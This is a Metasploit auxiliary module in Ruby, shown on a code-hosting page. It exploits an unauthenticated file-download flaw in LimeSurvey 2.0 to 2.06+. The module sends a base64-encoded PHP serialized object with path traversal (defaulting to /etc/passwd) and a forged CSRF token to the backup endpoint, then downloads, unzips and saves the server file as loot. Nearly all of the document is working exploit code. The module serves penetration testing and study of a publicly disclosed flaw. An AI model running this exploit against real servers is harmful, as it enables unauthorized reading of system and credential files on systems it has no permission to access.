Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/limesurvey_file_download.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# for extracting files

7
require 'zip'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Auxiliary::Report

11
  include Msf::Exploit::Remote::HttpClient

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Limesurvey Unauthenticated File Download',

18
        'Description' => %q{

19
          This module exploits an unauthenticated file download vulnerability

20
          in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded

21
          as a ZIP and unzipped automatically, thus binary files can be downloaded.

22
        },

23
        'Author' => [

24
          'Pichaya Morimoto', # Vulnerability Discovery

25
          'Christian Mehlmauer' # Metasploit module

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/'],

30
          ['URL', 'https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015'],

31
          ['URL', 'https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1']

32
        ],

33
        'DisclosureDate' => '2015-10-12',

34
        'Notes' => {

35
          'Stability' => [CRASH_SAFE],

36
          'SideEffects' => [IOC_IN_LOGS],

37
          'Reliability' => []

38
        }

39
      )

40
    )

41


42
    register_options(

43
      [

44
        Opt::RPORT(80),

45
        OptString.new('TARGETURI', [true, 'The base path to the limesurvey installation', '/']),

46
        OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),

47
        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 15])

48
      ]

49
    )

50
  end

51


52
  def filepath

53
    datastore['FILEPATH']

54
  end

55


56
  def traversal_depth

57
    datastore['TRAVERSAL_DEPTH']

58
  end

59


60
  def payload

61
    traversal = '/..' * traversal_depth

62
    file = "#{traversal}#{filepath}"

63
    serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' + file.length.to_s + ':"' + file + '";}}'

64
    Rex::Text.encode_base64(serialized)

65
  end

66


67
  def unzip_file(zipfile)

68
    zip_data = Hash.new

69
    begin

70
      Zip::File.open_buffer(zipfile) do |filezip|

71
        filezip.each do |entry|

72
          zip_data[::File.expand_path(entry.name)] = filezip.read(entry)

73
        end

74
      end

75
    rescue Zip::Error => e

76
      print_error("Error extracting ZIP: #{e}")

77
    end

78
    return zip_data

79
  end

80


81
  def run

82
    csrf_token = Rex::Text.rand_text_alpha(10)

83


84
    vars_post = {

85
      'YII_CSRF_TOKEN' => csrf_token,

86
      'destinationBuild' => Rex::Text.rand_text_alpha(5),

87
      'datasupdateinfo' => payload

88
    }

89


90
    res = send_request_cgi({

91
      'method' => 'POST',

92
      'uri' => normalize_uri(target_uri, 'index.php', 'admin', 'update', 'sa', 'backup'),

93
      'cookie' => "YII_CSRF_TOKEN=#{csrf_token}",

94
      'vars_post' => vars_post

95
    })

96


97
    if res && res.code == 200 && res.body && res.body.include?('Download this file')

98
      match = res.body.match(%r{<div class="updater-background">\s+<p class="success " style="text-align: left;">\s+<strong>[^<]+</strong>\s+<br/>\s+([^<]+)<br/>\s+<a class="btn btn-success" href="([^"]+)" title="Download this file">Download this file</a>})

99
      if match

100
        local_path = match[1]

101
        download_url = match[2]

102
        print_status("File saved to #{local_path}")

103
        print_status("Downloading backup from URL #{download_url}")

104


105
        res = send_request_cgi({

106
          'method' => 'GET',

107
          'uri' => download_url

108
        })

109


110
        if res && res.code == 200

111
          unzipped = unzip_file(res.body)

112


113
          unzipped.each do |filename, content|

114
            print_good("Filename: #{filename}")

115
            print_good(content)

116


117
            path = store_loot(

118
              'limesurvey.http',

119
              'application/octet-stream',

120
              rhost,

121
              content,

122
              filename

123
            )

124
            print_good("File saved in: #{path}")

125
          end

126
        else

127
          print_error('Failed to download file')

128
        end

129
      else

130
        print_error('Failed to download file')

131
      end

132
    else

133
      print_error('Failed to download file')

134
    end

135
  end

136
end

137


138